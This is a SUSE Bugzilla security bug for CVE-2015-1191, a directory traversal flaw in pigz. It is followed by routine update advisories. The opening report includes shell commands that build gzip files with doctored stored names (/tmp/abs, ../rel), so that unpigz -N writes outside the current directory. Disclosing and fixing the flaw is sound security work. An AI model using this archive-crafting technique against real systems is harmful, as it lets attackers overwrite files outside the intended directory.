Bugzilla – Bug 913627
VUL-0: CVE-2015-1191: pigz: directory traversal while decompressing a file with restoring file name
Last modified: 2016-03-06 03:12:15 UTC
CVE-2015-1191 pigz is susceptible to directory traversal vulnerabilities. While decompressing a file with restoring file name, it (unlike gzip) will happily use absolute and relative paths taken from the input. This can be exploited by a malicious archive to write files outside the current directory. 1. Absolute path. A sample could be prepared in following way: $ touch XtmpXabs $ gzip -c XtmpXabs | sed 's|XtmpXabs|/tmp/abs|g' > abs.gz $ rm XtmpXabs Then check it works: $ ls /tmp/abs ls: cannot access /tmp/abs: No such file or directory $ unpigz -N abs.gz $ ls /tmp/abs /tmp/abs 2. Relative path with "..". A sample could be prepared in following way: $ rm ../rel $ touch XXXrel $ gzip -c XXXrel | sed 's|XXXrel|../rel|g' > rel.gz $ rm XXXrel Then check it works: $ ls ../rel ls: cannot access ../rel: No such file or directory $ unpigz -N rel.gz $ ls ../rel ../rel References: https://github.com/madler/pigz/commit/fdad1406b3ec809f4954ff7cdf9e99eb18c2458f (fix) http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1191 http://seclists.org/oss-sec/2015/q1/170 http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1191.html
bugbot adjusting priority
An update workflow for this issue was started. This issue was rated as moderate. Please submit fixed packages until 2015-02-27. When done, reassign the bug to security-team@suse.de. https://swamp.suse.de/webswamp/wf/60669
Alex, any news here? The due date for submission was 2015-02-27. TIA.
SUSE-SU-2015:0670-1: An update that fixes one vulnerability is now available. Category: security (moderate) Bug References: 913627 CVE References: CVE-2015-1191 Sources used: SUSE Linux Enterprise Server 12 (src): pigz-2.3-5.1 SUSE Linux Enterprise Desktop 12 (src): pigz-2.3-5.1
SUSE-SU-2015:0716-1: An update that fixes one vulnerability is now available. Category: security (moderate) Bug References: 913627 CVE References: CVE-2015-1191 Sources used: SUSE Studio Onsite 1.3 (src): pigz-2.1.6-0.12.1
openSUSE Leap 42.1 Update already imported from SLE. Copied 13.2 and 13.1 submissions.
This is an autogenerated message for OBS integration: This bug (913627) was mentioned in https://build.opensuse.org/request/show/365313 13.2 / pigz
release 13.2
openSUSE-SU-2016:0650-1: An update that fixes one vulnerability is now available. Category: security (moderate) Bug References: 913627 CVE References: CVE-2015-1191 Sources used: openSUSE 13.2 (src): pigz-2.3-4.3.1
openSUSE-SU-2016:0662-1: An update that fixes one vulnerability is now available. Category: security (moderate) Bug References: 913627 CVE References: CVE-2015-1191 Sources used: openSUSE 13.1 (src): pigz-2.3-2.3.1